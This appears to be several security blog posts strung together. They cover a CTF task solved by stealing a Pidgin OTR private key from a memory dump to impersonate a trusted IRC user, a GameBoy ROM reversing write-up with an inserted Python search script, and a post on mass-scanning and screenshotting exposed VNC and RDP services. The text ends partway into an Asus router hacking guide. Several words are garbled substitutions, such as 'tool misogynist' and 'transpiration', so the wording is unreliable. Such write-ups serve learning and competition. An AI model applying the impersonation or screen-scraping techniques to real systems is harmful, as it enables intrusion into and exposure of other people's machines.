The first thing I did the next day was to re-read the challenge description, and I quickly figured it out:<br /><blockquote class="tr_bq"><i>"A 9447 CTF organizer is giving away flags to <u>friends that he trusts."</u></i></blockquote>Because of the way IRC works, I could easily impersonate testicool69 (the trusted friend), connect to the IRC server (yodawg.9447.plumbing:6667) and message acidburn88 (the CTF admin) asking for the key. OTR, however, authenticates the peer by the fingerprint of its long-term key, so I also needed to show up with testicool69's key. So how do I do that?<br /><br />Pidgin-OTR creates three files during an encrypted communication: otr.private_key, otr.instance_tags and otr.fingerprints. I searched for the string "prpl-irc" in the memory dump, extracted those files and dropped them into my own Pidgin installation (%APPDATA%\.purple). There's a <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/gather/pidgin_cred.rb">Metasploit post-module</a> to retrieve these keys from a live (hacked) system, by the way...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-NjB_-DWo6c0/VHuVw4sZBaI/AAAAAAAAAws/AVgNG52VpiE/s1600/cript0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-NjB_-DWo6c0/VHuVw4sZBaI/AAAAAAAAAws/AVgNG52VpiE/s1600/cript0.PNG" height="138" width="400" /></a></div><br /><script src="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738.js"></script><br />With the stolen private key my client presented his fingerprint, and I got the secret flag:<br /><br /><div style="text-align: center;"><b>9447{forensics_champ!}</b></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-d3TBUnFx5mM/VHuZNYQ4zgI/AAAAAAAAAxA/FPDHHcxxz6k/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-d3TBUnFx5mM/VHuZNYQ4zgI/AAAAAAAAAxA/FPDHHcxxz6k/s1600/1.PNG" height="265" width="400" /></a></div><br 
/>Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br /><br /><b>Hack.lu 2014 CTF Write Up: At Gunpoint</b><br />Published 2014-10-24T03:34:00.001-02:00, updated 2014-10-24T03:50:16.559-02:00<br /><br /><a href="http://2014.hack.lu/index.php/CaptureTheFlag">Hack.lu's 2014 CTF</a> took place on October 21-23. The event was organized by <a href="https://twitter.com/fluxfingers">fluxfingers</a>, and this year's challenges were really enjoyable, huge props to them. I played with my friends from TheGoonies - after winning the Brazilian CTF <a href="http://ctf.tecland.com.br/Pwn2Win/game/scoreboard/">Pwn2Win</a> we are now getting better organized to become more competitive. There are quite a few write ups around and I decided to post about a few tasks for which we had a different solution from other teams.<br /><br /><b>Task: At Gunpoint (Reversing - 200)</b><br /><br /><div class="code">You're the sheriff of a small town, investigating news about a gangster squad passing by. Rumor has it they're easy to outsmart, so you have just followed one to their encampment by the river. You know you can easily take them out one by one, if you would just know their secret handshake. </div><br />Download provided: <a href="https://wildwildweb.fluxfingers.net/static/chals/gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat">gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat</a><br /><br />The file utility showed us that it was a GameBoy ROM. 
Having former ROM hackers on the team came in handy during this challenge, as we already knew in advance which tools to use and what to look for.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ULb2LO-OgXE/VEnGAsma4NI/AAAAAAAAAn8/QtnmwkzE1zQ/s1600/file1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ULb2LO-OgXE/VEnGAsma4NI/AAAAAAAAAn8/QtnmwkzE1zQ/s1600/file1.png" height="55" width="400" /></a></div><br />We used <strike>TLayer</strike> <a href="http://www.romhacking.net/utilities/109/">TileMolester</a> from the legendary <a href="http://wiki.nesdev.com/w/index.php/Projects#stuff_by_SnowBro">SnowBro</a> to gather information about the graphics and the font data. First, we switched the codec to 1bpp and found the font used by the game.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-o64rgaew5aQ/VEnGLgBynrI/AAAAAAAAAoE/iEft2kZ8YA4/s1600/tlayer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-o64rgaew5aQ/VEnGLgBynrI/AAAAAAAAAoE/iEft2kZ8YA4/s1600/tlayer.png" height="297" width="320" /></a></div><br />We were about to create a character table when, after switching the codec to 2bpp planar (the GameBoy's native format), we found something interesting:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-JoALAZSAgyI/VEnGLgBxsqI/AAAAAAAAAoM/VsH3ygXBLPw/s1600/tlayer2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-JoALAZSAgyI/VEnGLgBxsqI/AAAAAAAAAoM/VsH3ygXBLPw/s1600/tlayer2.png" height="313" width="320" /></a></div><br />After some offset adjustment (using +, -, Shift + left and Shift + right) we got this image:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="http://2.bp.blogspot.com/-8dGAkPPxYYk/VEnGL-5TSoI/AAAAAAAAAoI/lUjCvzBtvkE/s1600/tlayer3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-8dGAkPPxYYk/VEnGL-5TSoI/AAAAAAAAAoI/lUjCvzBtvkE/s1600/tlayer3.png" height="146" width="320" /></a></div><br />We submitted the key "tkCXDtheQDNRN", but it wasn't accepted. I wanted to confirm that those tiles were arranged linearly, so I kept analyzing the ROM.<br /><br />The GameBoy's screen has a resolution of 20x18 tiles. In order to check whether the order of the tiles (and the flag) was correct, I performed a relative search using <a href="https://code.google.com/p/ricardojricken/">Darkl0rd's Monkey-Moore</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ZBPI2viaUZU/VEnMRGHIxrI/AAAAAAAAAos/kvbwAHuwAfA/s1600/moore.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ZBPI2viaUZU/VEnMRGHIxrI/AAAAAAAAAos/kvbwAHuwAfA/s1600/moore.PNG" height="297" width="400" /></a></div>Let's imagine a grid containing the tiles for the key "tkCXDtheQDNRN" sequentially. 
Considering the first tile as an A, the second one would be B, the third one C and so on. After 20 bytes (the screen width) there should be something like a line break: that's why I performed a relative search for ABCDEFGHIJKLMNOPQRST*UVWXYZ, where the * stands for one arbitrary byte.<br /><br />If we go to the ROM's offset 0x0965 using a hex editor, we find out that this is indeed the section responsible for displaying the tiles:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Ufjo_9E7NbY/VEnRhMZGETI/AAAAAAAAAo8/tNMvvqlrJfY/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Ufjo_9E7NbY/VEnRhMZGETI/AAAAAAAAAo8/tNMvvqlrJfY/s1600/hex.PNG" height="296" width="640" /></a></div><br />Let's compare it with the emulator's BGMAP when displaying the key:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-aCN_M2uh5Cw/VEnR3rdRYfI/AAAAAAAAApE/EGu-IjMtzUk/s1600/hexview.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-aCN_M2uh5Cw/VEnR3rdRYfI/AAAAAAAAApE/EGu-IjMtzUk/s1600/hexview.PNG" height="114" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-rtz7KRgKL6Q/VEnSAORJghI/AAAAAAAAApM/bGO7PCtKz_U/s1600/bug.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-rtz7KRgKL6Q/VEnSAORJghI/AAAAAAAAApM/bGO7PCtKz_U/s1600/bug.PNG" height="303" width="400" /></a></div><br />I'm not sure if this was intentional, but there's something strange on this key display screen. The first tile for the char "t" (0x15) is followed by the first tile from "k" (0x16), which is followed by the first tile from "C" (0x17), and so on until we reach the "N" (0x28). There's a break at offset 0x0979 (0x00) and the second half of these tiles (0x29 0x2A 0x2B ... 
0x3C) ends with a 0x3D instead of the usual 0x00. We can see this clearly on the screenshot above, as the tile highlighted by the mouse pointer (0x3D) is out of bounds.<br /><br />Anyway, we theoretically had the correct flag, but it took us some time to figure out that the 6th letter was a "J" and not a "t". One member of our team figured that out and submitted the correct key "tkCXDJheQDNRN".<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Uta0M4Ybd1c/VEnja48LkwI/AAAAAAAAAqA/D_MpotX6rnk/s1600/w00t.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Uta0M4Ybd1c/VEnja48LkwI/AAAAAAAAAqA/D_MpotX6rnk/s1600/w00t.PNG" height="218" width="320" /></a></div>There are other solutions to this challenge, like <a href="http://tasteless.se/2014/10/hack-lu-ctf-2014-at-gunpoint/">this one from Tasteless</a>. I'm still waiting for a write up from someone who actually reversed and entered the secret combination. 
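<br /><br />The relative search itself is a few lines of code. The Python script below is an added example, not code from the post or from Monkey-Moore: relative_search() returns every offset where the bytes keep the same distances as the letters of the pattern (a * matches exactly one arbitrary byte, the line-break slot after 20 tiles), row_terminators() reads the byte that follows each 20-tile row, which is how the stray 0x3D after the second row shows up, and tile_rows() splits the linear map into screen rows. The ROM is a constructed buffer that only reproduces the tile map bytes discussed above at offset 0x0965.

```python
from typing import List, Optional

SCREEN_WIDTH_TILES = 20   # Game Boy background: 20x18 visible tiles


def relative_search(rom: bytes, pattern: str, wildcard: str = "*") -> List[int]:
    """Offsets where rom[off+i] - ord(pattern[i]) is the same constant for
    every fixed character, i.e. the bytes are the pattern shifted by one
    value. The wildcard consumes exactly one byte and may hold anything."""
    hits = []
    for off in range(len(rom) - len(pattern) + 1):
        delta: Optional[int] = None
        for i, ch in enumerate(pattern):
            if ch == wildcard:
                continue
            d = rom[off + i] - ord(ch)
            if delta is None:
                delta = d
            elif d != delta:
                break
        else:                      # no break: every fixed char agreed on delta
            hits.append(off)
    return hits


def row_terminators(rom: bytes, start: int, rows: int, width: int = SCREEN_WIDTH_TILES) -> List[int]:
    """The byte right after each row of `width` tiles; this ROM's text routine
    is expected to put a 0x00 there."""
    out = []
    pos = start
    for _ in range(rows):
        pos += width
        out.append(rom[pos])
        pos += 1
    return out


def tile_rows(rom: bytes, start: int, rows: int, width: int = SCREEN_WIDTH_TILES) -> List[bytes]:
    """Split the linear tile map into screen rows, skipping the separator byte."""
    stride = width + 1
    return [rom[start + r * stride: start + r * stride + width] for r in range(rows)]


def build_sample_rom() -> bytes:
    """Constructed ROM image: filler, then the tile map as seen on the page at
    0x0965 (0x15..0x28, a 0x00 break, 0x29..0x3C, then the stray 0x3D)."""
    tilemap = bytes(range(0x15, 0x29)) + b"\x00" + bytes(range(0x29, 0x3D)) + b"\x3D"
    return b"\xff" * 0x0965 + tilemap + b"\xff" * 64


if __name__ == "__main__":
    rom = build_sample_rom()
    for off in relative_search(rom, "ABCDEFGHIJKLMNOPQRST*UVWXYZ"):
        print(f"tile map candidate at 0x{off:04X}")
        print("row terminators:", [hex(b) for b in row_terminators(rom, off, rows=2)])
        for row in tile_rows(rom, off, rows=2):
            print(" ".join(f"{t:02X}" for t in row))
```

The same search without the wildcard finds nothing, which is the quick way to confirm that the text routine really does insert a separator every 20 tiles.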
Anyway, none of them are going to be as elegant as the one from <a href="https://twitter.com/angealbertini">@angealbertini</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-CzZfd3qcj5w/VEnZsoLzi_I/AAAAAAAAApc/WIsBdtP-DtE/s1600/ange.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-CzZfd3qcj5w/VEnZsoLzi_I/AAAAAAAAApc/WIsBdtP-DtE/s1600/ange.PNG" height="75" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-tQz8rPuH-Jo/VEnZyh3ammI/AAAAAAAAApk/gZISApO65H0/s1600/ange2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-tQz8rPuH-Jo/VEnZyh3ammI/AAAAAAAAApk/gZISApO65H0/s1600/ange2.PNG" height="212" width="640" /></a></div>Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br /><br /><b>Scan the Internet & Screenshot All the Things</b><br />Published 2014-08-17T13:00:00.000-03:00, updated 2014-08-22T01:56:46.617-03:00<br /><br />During Defcon 22, <a href="https://twitter.com/erratarob">@ErrataRob</a>, <a href="https://twitter.com/paulm">@paulm</a> and <a href="https://twitter.com/viss">@Viss</a> (mass)scanned the Internet and presented some <a href="https://www.defcon.org/html/defcon-22/dc-22-speakers.html#Graham">Tips, Tricks and Results</a>. Lots of people confronted <a href="https://twitter.com/viss">@Viss</a> after he posted some <a href="https://twitter.com/Viss/media">VNC screenshots on his Twitter timeline</a>. 
He posted a <a href="http://atenlabs.com/blog/scanning-the-whole-internet/">follow-up article on his blog</a> and Kashmir Hill, from Forbes, wrote an <a href="http://www.forbes.com/sites/kashmirhill/2014/08/13/so-many-pwns/">article</a> about the exposed VNC services.<br /><br />Internet scanning isn't new anymore, yet people are still surprised by these results. For this post I'll share some techniques I commonly use to map and screenshot several Internet services during pentest engagements. All of this can easily be adapted to other protocols and services, so let's start to Screenshot All the Things.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XMkkF3bNJr4/U-_KH8dTsOI/AAAAAAAAAlM/qleJT1yBBfQ/s1600/16284207.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XMkkF3bNJr4/U-_KH8dTsOI/AAAAAAAAAlM/qleJT1yBBfQ/s1600/16284207.jpg" height="240" width="320" /></a></div><br /><b>VNC</b><br /><br />The easiest way to snapshot these services is to use preexisting tools and script/mod them according to your needs. 
In order to take screenshots of VNC sessions, I often use <a href="https://kanaka.github.io/noVNC/">noVNC</a> (an HTML5 VNC client) and a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">command line utility that captures WebKit's rendering of a web page</a>.<br /><br />The process is pretty straightforward:<br /><br />1 - Clone the noVNC project from <a href="https://github.com/kanaka/noVNC">github</a>:<br /><br /><div class="code">git clone git://github.com/kanaka/noVNC</div><br />2 - Start the mini-webserver and specify the location of the VNC server you want to screenshot:<br /><br /><div class="code">./noVNC/utils/launch.sh --vnc 192.168.1.142:5900</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ESph1VwLdJE/U-_drKFnIpI/AAAAAAAAAlc/RBWWYFngCwM/s1600/111.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ESph1VwLdJE/U-_drKFnIpI/AAAAAAAAAlc/RBWWYFngCwM/s1600/111.png" height="261" width="400" /></a></div><br />3 - Take a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">webpage screenshot</a> from the command line using <a href="http://cutycapt.sourceforge.net/">CutyCapt</a>, for example (vnc_auto.html connects on page load, so give it a few seconds before capturing):<br /><br /><div class="code">cutycapt --url="http://127.0.0.1:6080/vnc_auto.html" --javascript=on --out=vnc.png --delay=3000</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9yv3XKSIjDo/U-_dvUIV7UI/AAAAAAAAAlk/zRjus4uSQ-I/s1600/Screenshot%2Bfrom%2B2014-08-16%2B19%5E6%5E%01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-9yv3XKSIjDo/U-_dvUIV7UI/AAAAAAAAAlk/zRjus4uSQ-I/s1600/Screenshot%2Bfrom%2B2014-08-16%2B19%5E%36%5E%01.png" height="345" width="400" /></a></div><br />4 - Profit!!!<br /><br />Now all you have to do is masscan the target for ports 5900-5910 
(used by VNC), save the results on a text file and create a simple script to take the screenshots. You can moreover try <a href="https://github.com/shamun/vncsnapshot">vncsnapshot</a>, used by <a href="https://twitter.com/paulm">@paulm</a> during his <a href="https://github.com/PaulMcMillan/toorcon_2013">Toorcon 2013 talk</a>.<br /><br /><b>RDP</b><br /><br />My tool of nomination for taking snapshots of RDP services is <a href="http://www.remotespark.com/">Spark View</a>. There's an <a href="http://www.remotespark.com/html5.html">HTML5 version</a> for the tool misogynist <a href="http://www.remotespark.com/html5.html">here</a>&nbsp;and the process is quite similar to the VNC one:<br /><br />1 - Download and install Spark View for <a href="http://www.remotespark.com/view/SparkGateway-installer.exe">Windows </a>or <a href="http://www.remotespark.com/view/SparkGateway.zip">Linux</a>. Follow the procedure from the <a href="http://www.remotespark.com/view/AdminManual.pdf">Admin Manual</a>, install J2SE JDK, set the&nbsp;JAVA_HOME environment variable, extract, configure and compile the utils from commons-daemon-native.tar.gz. On Debian derivatives, you may need to edit <i>SparkGateway.sh</i> and transpiration the source function library to "/lib/lsb/init-functions".<br /><br />2 - Start the service (./SparkGateway.sh start) and test it by accessing your local IP on port 80. Remote Spark provides a live demo for their solution <a href="http://www.remotespark.com:8080/">here</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-aOdmqeIl27E/U-_y0oFNhzI/AAAAAAAAAl0/_K_7i9dIbD0/s1600/rdp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-aOdmqeIl27E/U-_y0oFNhzI/AAAAAAAAAl0/_K_7i9dIbD0/s1600/rdp1.png" height="244" width="320" /></a></div><br />3 - Specify the RDP server settings on the querystring and take a webpage screenshot using a writ line tool. 
I'm going to use <a href="http://phantomjs.org/">phantomjs</a> + <a href="https://gist.github.com/sbehrens/11384864">url-to-image.js</a> for this example:<br /><br /><div class="code">phantomjs url-to-image.js "http://127.0.0.1/rdpdirect.html?gateway=127.0.0.1&amp;server=192.168.1.189&amp;width=800&amp;height=600&amp;color=16" rdp.png 800 600</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-5lUfvUgFZqA/U-_y0szIDOI/AAAAAAAAAl4/pJelkMjPJyk/s1600/rdp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-5lUfvUgFZqA/U-_y0szIDOI/AAAAAAAAAl4/pJelkMjPJyk/s1600/rdp2.png" height="366" width="400" /></a></div><br />4 - Profit!!!<br /><br />Some commercial tools like Nessus moreover connects to RDP services and&nbsp;<a href="http://www.tenable.com/blog/nessus-52-released">captures screenshots</a>.&nbsp;Taking screenshots from RDP services is very useful to fingerprint operating systems and to map/identify domains and users on the network. 
I always feed these images to <a href="https://help.ubuntu.com/community/OCR">OCR</a>&nbsp;tools like <a href="https://code.google.com/p/tesseract-ocr/">tesseract</a> and <a href="http://jocr.sourceforge.net/">gocr</a> in order to generate wordlists and compile other useful data:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-v_sz3McErGs/U-_7_7A336I/AAAAAAAAAmM/Fps_8Y9cgyo/s1600/ocr1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-v_sz3McErGs/U-_7_7A336I/AAAAAAAAAmM/Fps_8Y9cgyo/s1600/ocr1.png" height="260" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RDP screenshot</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-5bfR02dY7Vw/U-_8C29XP6I/AAAAAAAAAmU/vzWWhvK7L_4/s1600/ocr2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-5bfR02dY7Vw/U-_8C29XP6I/AAAAAAAAAmU/vzWWhvK7L_4/s1600/ocr2.png" height="157" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">gocr output</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-RZ25pqtfRt0/U-_8GH7a15I/AAAAAAAAAmc/gFvL5ffD14Y/s1600/ocr3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-RZ25pqtfRt0/U-_8GH7a15I/AAAAAAAAAmc/gFvL5ffD14Y/s1600/ocr3.png" height="185" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">tesseract output</td></tr></tbody></table><br /><b>HTTP</b><br /><b><br /></b>There's nothing much to be said about Web Services screenshots. There are lots of posts covering this topic and lots of different tools, including an Nmap plugin. Some references:<br /><br />- <a href="http://blog.spiderlabs.com/2012/06/using-nmap-to-screenshot-web-services.html">Using Nmap to Screenshot Web Service (http-screenshot.nse</a>)<br />-&nbsp;<a href="http://wiki.securityweekly.com/wiki/index.php/Episode295">PaulDotCom Security Weekly 295 - Tech Segment</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MJMK3I-eERs/U_AGRHFPLII/AAAAAAAAAnA/pvl86mSJrZo/s1600/nmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MJMK3I-eERs/U_AGRHFPLII/AAAAAAAAAnA/pvl86mSJrZo/s1600/nmap.png" height="143" width="400" /></a></div><br />-&nbsp;<a href="https://www.christophertruncer.com/eyewitness-triage-tool/">EyeWitness - A Web Application Triage and Info-Gathering Tool</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-GPy_NHTjlXM/U_AABTb0W5I/AAAAAAAAAmo/7HByPddgRd4/s1600/EyeWitnessUI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-GPy_NHTjlXM/U_AABTb0W5I/AAAAAAAAAmo/7HByPddgRd4/s1600/EyeWitnessUI.png" height="131" width="400" /></a></div><br /><b>Conclusion</b><br /><b><br /></b>I find these tips very useful to get a better view of network services. Now that reporters are getting a pretty good idea of the attacker's perspective, you have no excuse to leave your <a href="https://twitter.com/semibogan/status/499787869066498048">screens exposed</a> to the Internet without a VNC password.
It's also important to practice safe computing, changing default passwords and enabling <a href="https://en.wikipedia.org/wiki/Network_Level_Authentication">Network Level Authentication</a>&nbsp;for RDP services.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1xwkCwfLAlw/U_AB4BYDTAI/AAAAAAAAAm0/xF77ZcBNLcA/s1600/movie.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-1xwkCwfLAlw/U_AB4BYDTAI/AAAAAAAAAm0/xF77ZcBNLcA/s1600/movie.PNG" height="383" width="400" /></a></div>Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br /><br /><b>Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTF</b><br />Published 2014-07-17T11:03:00-03:00, updated 2014-07-21T11:49:10-03:00<br /><br />So it's finally July, time to pack for DEFCON, follow <a href="https://twitter.com/defconparties">@defconparties</a> on Twitter and decide which <a href="http://defcne.net/villages/22">villages</a>&nbsp;to visit and which <a href="https://www.defcon.org/html/defcon-22/dc-22-schedule.html">talks</a> to attend.<br /><br />There's a new hacking competition this year called <a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken</a>, presented by ISE and EFF. The objective on&nbsp;<a href="http://sohopelesslybroken.com/track0.php">Track 0</a> is to demonstrate previously unidentified vulnerabilities in off-the-shelf consumer wireless routers. <a href="http://sohopelesslybroken.com/track1.php">Track 1</a>&nbsp;will hold a live CTF for the duration of DEFCON. CTFs are always fun, and this competition involves hacking real embedded devices, which makes it even more fun.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/---dhUkhmQuU/U8H-IO713pI/AAAAAAAAAdQ/HpeQJpqtIY0/s1600/meme2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/---dhUkhmQuU/U8H-IO713pI/AAAAAAAAAdQ/HpeQJpqtIY0/s1600/meme2.png" height="304" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Yes, that's my workstation =P</td></tr></tbody></table>I'm particularly interested in the <a href="https://openwireless.org/">EFF Open Wireless Router</a>, but they haven't released details about the device yet. According to the <a href="http://sohopelesslybroken.com/track0.php">event rules</a>, the <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">ASUS RT-AC66U</a> (HW Ver. A2) [Version 3.0.0.4.266] is one of the possible targets. As I had a spare RT-AC66U at home, I decided to write a quick guide for everyone interested in participating in this <strike>competition</strike> CTF.<br /><br /><b>recon</b><br /><br />The first thing to do is to find the firmware and its source code. Luckily, the Asus RT-AC66U firmware is GPL'ed and we can easily find its source online. The version used for the competition is an old one, from 2012.
In order to perform a better analysis, we are going to grab the sources and the firmware from v3.0.0.4.266 and v3.0.0.4.376.1123 (the most recent one as of this writing).<br /><br /><ul><li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/FW_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266&nbsp;- Firmware</a></li><li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/GPL_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266&nbsp;- Source Code</a></li><li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Firmware</a></li><li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/GPL_RT-AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Source Code</a></li></ul><br />Many firmware versions were published between these two releases; we can review the changelogs to find security issues:<br /><br /><ul><li><a href="http://www.asus.com/Networking/RTAC66U/HelpDesk_Download/">http://www.asus.com/Networking/RTAC66U/HelpDesk_Download</a></li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-wjERjTKfWVs/U8HfLIzk1XI/AAAAAAAAAb8/AQcXTFCbmsY/s1600/sec1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-wjERjTKfWVs/U8HfLIzk1XI/AAAAAAAAAb8/AQcXTFCbmsY/s1600/sec1.png" height="235" width="400" /></a></div><br />According to the rules, we have to identify and exploit a 0-day vulnerability. We can combine different flaws with known issues in order to score points. If the vendor had silently patched an issue and you create an exploit for it, that should be scored as a valid 0-day (I'm not going to start discussing terminologies here).<br /><br />Now that we have the source code, it's time to extract and inspect it: The&nbsp;<a href="https://trailofbits.github.io/ctf">CTF Field Guide</a>&nbsp;from Trail of Bits has some good resources on <a href="https://trailofbits.github.io/ctf/vulnerabilities/source.html">Auditing Source Code</a>. You can use tools like <a href="http://www.scootersoftware.com/">Beyond Compare</a>, <a href="http://www.araxis.com/merge/">Araxis Merge</a> and&nbsp;<a href="http://winmerge.org/">WinMerge</a>&nbsp;on Windows platforms or&nbsp;<a href="http://meldmerge.org/">Meld</a> if you're more of a Linux user.<br /><br />Let's focus on the "/asuswrt/release/src/router/" directory, comparing these two folders using Meld:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_w86JGA7QGg/U8HwRCLopYI/AAAAAAAAAcM/xR2m1ctffTk/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-_w86JGA7QGg/U8HwRCLopYI/AAAAAAAAAcM/xR2m1ctffTk/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" height="363" width="640" /></a></div><br />There are many security advisories for this router: if you want to find 0-days you should look for disclosed vulnerabilities and exploits to avoid duplicates (believe me, this is the hardest part). Some references:<br /><br /><ul><li><a href="http://infosec42.blogspot.com.br/2013/07/exploit-asus-rt-ac66u-remote-root.html">ASUS RT-AC66U Remote Root (Broadcom ACSD)</a></li><li><a href="http://www.securityfocus.com/archive/1/526942">ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln</a></li><li><a href="https://hatriot.github.io/blog/2013/06/05/asus-rt56u-remote-command-injection/">Asus RT56U Remote Command Injection</a></li><li><a href="http://securityevaluators.com/knowledge/case_studies/routers/asus_rtn56u.php">Taking over the ASUS RT-N56U and RT-AC66U</a></li><li><a href="http://arstechnica.com/security/2014/02/dear-asus-router-user-youve-been-pwned-thanks-to-easily-exploited-flaw/">Dear Asus router user: You’ve been pwned, thanks to easily exploited flaw (Asusgate)</a></li><li><a href="http://osvdb.com/search?search%5Bvuln_title%5D=asus&amp;search%5Btext_type%5D=alltext">OSVDB</a></li></ul><br />Points are deducted from your score if your exploit requires special system 